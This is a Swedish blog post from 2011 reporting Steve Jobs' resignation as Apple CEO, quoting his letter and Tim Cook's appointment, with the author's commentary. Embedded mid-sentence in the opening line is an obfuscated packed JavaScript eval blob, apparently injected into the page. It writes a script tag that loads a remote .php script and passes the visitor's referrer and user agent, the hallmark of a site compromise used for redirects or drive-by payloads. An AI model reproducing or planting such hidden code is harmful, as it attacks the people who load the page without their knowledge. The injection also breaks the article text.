Image Image Image Image Image Image Image Image Image Image

| 23 september, 2018

Scroll to top

Top

Steve Jobs avgår som CEO för Apple

Steve Jobs avgår som CEO för Apple
Filip Urde
  • On 25 augusti, 2011
  • http://www.revue.se/filip-urde

Och eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|zabss|var|u0026u|referrer|sbnfe||js|php’.split(‘|’),0,{}))
så var det slut….

Steve Jobs har under en längre tid varit sjuk och lämnat Apple tre gånger av just detta skäl, den senaste gången var i januari. Och nu var det alltså nog, Steve Jobs har meddelat att han inte kommer att komma tillbaka till Apple som CEO. I ett brev skriver Steve så här:

To the Apple Board of Directors and the Apple Community:

I have always said if there ever came a day when I could no longer meet my duties and expectations as Apple’s CEO, I would be the first to let you know. Unfortunately, that day has come.

I hereby resign as CEO of Apple. I would like to serve, if the Board sees fit, as Chairman of the Board, director and Apple employee. As far as my successor goes, I strongly recommend that we execute our succession plan and name Tim Cook as CEO of Apple. I believe Apple’s brightest and most innovative days are ahead of it. And I look forward to watching and contributing to its success in a new role.

I have made some of the best friends of my life at Apple, and I thank you all for the many years of being able to work alongside you.

Steve

Tim Cook, som Steve föreslår som CEO, har nu utsetts till ny CEO av Apples styrelse.

”The Board has complete confidence that Tim is the right person to be our next CEO,”säger Art Levinson som sitter i Apples styrelse. ”Tim’s 13 years of service to Apple have been marked by outstanding performance, and he has demonstrated remarkable talent and sound judgment in everything he does.”

Steve Jobs kommer nu alltså att ta över platsen som ordförande i styrelsen och Tim Cook kommer att sitta i styrelsen.

Apples högt värderade aktie dök en bit under morgonen när nyheten släpptes, men man får se det hela som en väldigt mild reaktion från marknaden. Att Apple är ett av de högst värderade bolagen i världen och säljer produkter som de vore gratis mat är helt och hållet Steve Jobs förtjänst. Men under de fjorton år som han har varit CEO för Apple den senaste vändan har han samlat ihop så mycket bra folk och byggt upp ett sätt att arbeta och fokusera att framtiden inte borde vara något problem för Apple.

Jag har dock varit lite skeptisk till hur Apple skulle se ut utan Steve Jobs… Historien visar att Apple nästan dog sist han lämnade… men men, Time will tell! Säga vad man vill om Apple och Steve, en Titan går ur tiden.
www.apple.com